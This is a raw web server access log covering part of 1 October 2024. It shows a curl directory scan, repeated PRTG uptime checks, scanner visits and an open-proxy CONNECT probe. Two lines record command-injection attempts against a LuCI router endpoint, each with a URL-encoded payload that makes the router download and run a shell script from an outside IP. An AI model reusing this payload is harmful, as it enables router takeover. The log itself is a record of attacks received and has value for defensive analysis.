172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /geoserver/index.html HTTP/1.1" 404 325 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /base.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /geoserver/ HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1" 404 375 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /menu.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1" 404 375 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /indice.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /Account/Login HTTP/1.1" 404 318 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /admin.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /cgi-bin/info.cgi HTTP/1.1" 404 321 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /indice.jsa HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /xml/info.xml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:29 +0200] "GET /admin.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /menu.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /inicio.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /base.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /inicio.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /start.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /admin.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:30 +0200] "GET /localstart.jsa HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /admin.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /home.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /default.html HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /admin.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:31 +0200] "GET /inicio.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /base.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /indice.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /admin.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /base.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /index.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET /base.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:32 +0200] "GET default.asp HTTP/1.1" 400 333 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /base.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /base.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /base.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /index.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /base.inc HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:33 +0200] "GET /default.jhtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /start.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /main.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /default.pl HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /indice.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /admin.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:34 +0200] "GET /localstart.jhtml HTTP/1.1" 404 321 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /indice.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /home.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /home.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /index.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /home.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:35 +0200] "GET /menu.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /localstart.jsp HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /menu.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /localstart.shtml HTTP/1.1" 404 321 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /indice.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /indice.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /inicio.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:36 +0200] "GET /start.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /admin.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /main.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /inicio.jhtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /inicio.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /index.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /home.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:37 +0200] "GET /main.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /inicio.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /menu.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /inicio.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /inicio.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /localstart.pl HTTP/1.1" 404 318 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:38 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /indice.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /home.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /indice.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /index.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /start.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /admin.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:39 +0200] "GET /indice.jhtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /default.php HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /localstart.html HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /localstart.cgi HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /localstart.cfm HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /localstart.aspx HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:40 +0200] "GET /home.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /main.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /start.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /default.shtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /menu.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /default.aspx HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /start.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:41 +0200] "GET /start.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /localstart.php HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /admin.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /menu.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /base.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /main.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /home.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /index.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /start.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:42 +0200] "GET /index.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /main.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /main.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /start.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /menu.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /default.cgi HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /main.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /default.jsa HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /main.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /main.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /start.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /base.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /default.jsp HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /inicio.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /home.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET /default.cfm HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.137.47 - - [01/Oct/2024:12:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:11:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:12:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:13:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:12:15:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:15:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:17:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:18:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:21:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.238.181.33 - - [01/Oct/2024:12:24:29 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:24:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.8 - - [01/Oct/2024:12:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.213.187.244 - - [01/Oct/2024:12:25:42 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:25:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:27:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:12:27:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:28:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:29:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:30:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.150.226 - - [01/Oct/2024:12:30:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [01/Oct/2024:12:31:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.129.54 - - [01/Oct/2024:12:31:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Oct/2024:12:31:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.83 - - [01/Oct/2024:12:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.43 - - [01/Oct/2024:12:32:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:32:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:33:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:34:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:35:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.86 - - [01/Oct/2024:12:36:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2024:12:36:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:38:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:39:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:40:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.238.181.23 - - [01/Oct/2024:12:41:29 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:43:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.15 - - [01/Oct/2024:12:45:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Oct/2024:12:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:46:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [01/Oct/2024:12:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15"
212.91.246.72 - - [01/Oct/2024:12:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.78 - - [01/Oct/2024:12:48:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Oct/2024:12:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.76 - - [01/Oct/2024:12:51:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [01/Oct/2024:12:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [01/Oct/2024:12:52:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.899 Yowser/2.5 Safari/537.36"
65.49.1.67 - - [01/Oct/2024:12:52:24 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Oct/2024:12:52:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [01/Oct/2024:12:53:09 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15"
141.98.11.15 - - [01/Oct/2024:12:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Oct/2024:12:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
